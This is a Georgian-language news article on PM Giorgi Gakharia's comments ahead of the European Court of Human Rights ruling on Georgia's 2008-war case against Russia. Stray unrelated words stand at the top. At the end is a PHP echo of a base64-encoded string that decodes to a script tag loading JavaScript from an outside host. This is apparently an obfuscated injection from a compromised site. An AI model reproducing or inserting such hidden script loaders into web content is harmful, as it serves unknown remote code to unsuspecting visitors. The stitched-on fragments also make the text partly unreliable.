celsiusi
ავერსი შნაიდერი
დღეს ადამიანის უფლებათა ევროპული სასამართლოს დიდი პალატა 2008 წლის აგვისტოს ომის გამო საქართველოს მიერ რუსეთის წინააღმდეგ შეტანილ სარჩელზე გადაწყვეტილებას გამოაცხადებს.
 
საქართველოს პრემიერ-მინისტრმა გიორგი გახარიამ მთავრობის სხდომის დაწყებამდე დღევანდელ დღეს უწოდა „უმნიშვნელოვანესი დღე საქართველოს უახლეს ისტორიაში“ და აღნიშნა, რომ ადამიანის უფლებათა ევროპული სასამართლოს გადაწყვეტილება საქართველოს 12 წლიანი შრომის შედეგი იქნება.
 
„დარწმუნებულები ვართ, რომ ეს იქნება სამართლიანი გადაწყვეტილება. ყველას უნდა გვესმოდეს, რომ ეს გარდა იმისა, რომ ახდენს კომპენსაციას ჩვენი დაზარალებული მოქალაქეებისთვის და იქმნება საფუძველი მათი ინტერესების შემდგომი დაცვისთვის საერთაშორისო დონეზე. ეს არის პირველი საერთაშორისო სასამართლოს შეფასება 2008 წლის ომზე“, - განაცხადა გახარიამ.
 
მისი თქმით, აღნიშნული გადაწყვეტილება საქართველოს დეოკუპაციის პროცესში უფრო მეტ პასუხისმგებლობას დააკისრებს. 
 
„ეს გადაწყვეტილება, ჩვენ როგორც მთავრობას, გვაკისრებს ვალდებულებებს და უახლოეს პერიოდში უნდა გადავდგათ უწყებათაშორის დონეზე კონკრეტული ნაბიჯები ქვეყნის დეოკუპაციის მიმართულებით. ამ ნაწილში ჩვენ გვაქვს გეგმა, რომელსაც მივყვებით და რომელსაც საზოგადოებას უახლოეს პერიოდში გავაცნობთ“, - განაცხადა პრემიერ-მინისტრმა.
 
შეგახსენებთ, რომ საქართველომ სტრასბურგის სასამართლოს 2008 წლის აგვისტოში მიმართა. 2011 წლის დეკემბერში სასამართლომ საქართველოს სარჩელი ნაწილობრივ დასაშვებად ცნო. 2016 წლის ივნისში მოწმეები და ექსპერტები დაკითხეს. საქმის ბოლო ზეპირი მოსმენა კი 2018 წლის მაისში შედგა.
1631
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");